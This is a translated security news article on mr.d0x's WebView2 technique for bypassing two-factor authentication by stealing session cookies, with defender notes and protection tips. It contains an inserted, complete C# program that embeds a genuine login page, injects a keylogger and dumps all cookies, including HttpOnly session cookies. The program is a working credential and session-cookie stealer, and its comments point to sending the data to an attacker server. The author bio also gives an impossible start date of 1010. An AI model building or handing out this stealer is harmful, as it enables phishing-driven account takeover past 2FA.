Microsoft, of all people, hands phishers a way past two-factor authentication (2FA): the WebView2 component built on its own Edge browser.
In a recently published article, the anonymous security researcher mr.d0x explains how the WebView2 component can be used to get around 2FA. After a successful 2FA login, a website stores a session cookie in the browser so the user does not have to authenticate again on every request. mr.d0x's technique lets a third party read these cookies from inside a WebView2-based application and use them to gain full access to the account. WebView2 is built on the Chromium engine of the Microsoft Edge browser.
With a stolen session cookie, the second factor via app or SMS is never asked for. Some, but not all, providers additionally check which browser or device a session comes from; if it differs from the ones used previously, the user must also confirm their identity via a link in an e-mail sent for this purpose. That would make it considerably harder for phishers to take over the account.
What is WebView2?
WebView2 is Microsoft's control for embedding web content in native Windows applications. It renders pages with the Chromium-based Microsoft Edge engine and gives the host application programmatic access to the embedded page, including the ability to run scripts in it and to read its cookies.
It’s not that easy after all
Once the victim has started the malicious application, it is simple for the attackers to log the keystrokes typed into the login page and to send the session cookies to their own servers on the Internet instead of leaving them with the user. The website then believes the person on the other end is already authenticated. Microsoft has already responded to the WebView2 issue: this is a social engineering attack and therefore not so dramatic, because the user first has to run a malicious file. That is true. But it is certainly not an insurmountable obstacle for cybercriminals.
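The mechanics described above, as an added example that is not code from this article or from mr.d0x's proof of concept: a minimal C# WinForms host that embeds WebView2, loads a legitimate login page, forwards every keystroke on that page to the host, and reads the page's cookies after each navigation. The class name, the target URL, the temporary user-data folder and the local log file are placeholders chosen for this demonstration; a real phishing kit would send the recorded data to an attacker-controlled server instead of writing it to disk.

```csharp
// Added example, not the article's or mr.d0x's code. Demonstrates why a malicious
// WebView2 host sees everything the embedded login page sees.
// Build: dotnet new winforms; dotnet add package Microsoft.Web.WebView2;
// replace Form1.cs with this file. Requires the WebView2 Runtime on the machine.
using System;
using System.IO;
using System.Text.Json;
using System.Threading.Tasks;
using System.Windows.Forms;
using Microsoft.Web.WebView2.Core;
using Microsoft.Web.WebView2.WinForms;

public class HostForm : Form
{
    // Assumption: the victim is lured into signing in to this legitimate site inside the app.
    private const string LoginUrl = "https://login.microsoftonline.com/";

    // Placeholder paths for this demonstration.
    private static readonly string UserDataFolder = Path.Combine(Path.GetTempPath(), "wv2-demo-profile");
    private static readonly string LogFile = Path.Combine(Path.GetTempPath(), "wv2-demo.log");

    private readonly WebView2 _webView = new WebView2 { Dock = DockStyle.Fill };

    // Injected into every document before any page script runs. Each keystroke is
    // forwarded to the host process through the WebView2 message channel, so the
    // password is captured even though the page itself is the genuine login page.
    private const string KeyLogger = @"
        document.addEventListener('keydown', function (e) {
            var t = e.target;
            window.chrome.webview.postMessage(JSON.stringify({
                type: 'key',
                key: e.key,
                field: t ? (t.name || t.id || t.tagName) : ''
            }));
        }, true);";

    public HostForm()
    {
        Text = "Sign in";
        Controls.Add(_webView);
        Load += async (_, __) => await StartAsync();
    }

    private async Task StartAsync()
    {
        // A private user-data folder keeps this session isolated. Pointing it at an
        // existing Edge profile would instead expose that profile's stored cookies.
        var env = await CoreWebView2Environment.CreateAsync(null, UserDataFolder);
        await _webView.EnsureCoreWebView2Async(env);

        var core = _webView.CoreWebView2;
        await core.AddScriptToExecuteOnDocumentCreatedAsync(KeyLogger);
        core.WebMessageReceived += (_, e) => Record(e.TryGetWebMessageAsString());
        core.NavigationCompleted += async (_, e) => await DumpCookiesAsync(core);
        core.Navigate(LoginUrl);
    }

    private static async Task DumpCookiesAsync(CoreWebView2 core)
    {
        // The host reads cookies directly from the cookie manager, including HttpOnly
        // ones that page JavaScript could never access. After a completed 2FA login
        // these are the session cookies an attacker would replay from another machine,
        // which is exactly what makes the second factor irrelevant.
        var cookies = await core.CookieManager.GetCookiesAsync(core.Source);
        foreach (var c in cookies)
        {
            Record(JsonSerializer.Serialize(new
            {
                type = "cookie",
                c.Domain, c.Name, c.Value, c.IsHttpOnly, c.IsSecure
            }));
        }
    }

    private static void Record(string line)
    {
        // A phishing kit would POST this to an attacker server; here it only goes to a local file.
        File.AppendAllText(LogFile, line + Environment.NewLine);
    }

    [STAThread]
    public static void Main() => Application.Run(new HostForm());
}
```

Two things worth noting from a defender's point of view. First, the login page is the real one, with the real TLS certificate, so nothing the user can inspect in the embedded window looks wrong; the only visible tell is that the "browser" is an application the user was asked to run. Second, the cookies come out of `CookieManager`, not out of the page, so neither the site's Content Security Policy nor the `HttpOnly` flag offers any protection. The one server-side control that still bites is the new-device check mentioned above: a session cookie replayed from an unfamiliar browser or IP address can be forced through an e-mail confirmation.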
How to protect yourself from the WebView2 bug?
- It sounds trivial, but it is true: don't use Windows! WebView2 runs only on Windows, so this particular attack does not exist anywhere else.
- Never open executable files you have received via messenger, e-mail, etc.
- Be careful when opening other media as well. Don't forget: PDF documents, videos, etc. can also carry malware.
- Never open links you do not know, especially if you don't know the sender.
- Windows users: keep your antivirus software up to date.
- Download new programs only from trusted sources.
The drawback for phishers is that the victim must first have executed a malicious file. Fortunately, outwitting 2FA is not that easy.
Incidentally, cybercriminals can extend the functionality of such a WebView2 application; this could, for example, even provide remote access to the victim's computer. In the method presented by mr.d0x, the binary uses only legitimate functions provided by Microsoft, which probably makes it harder for antivirus programs to recognise it as malicious.
If you are interested in further details, you can read the security researcher's full step-by-step instructions here. An introduction to Microsoft Edge WebView2 is available there.
Lars Sobiraj started in 1010 as a career changer writing for various computer magazines. In 2000, numerous other online magazines were added alongside gulli.com. He is the founder of Tarnkappe.info. Since 2014, Ghandy, as he calls himself in the scene, has also been teaching participants at various universities and training institutions how the Internet works.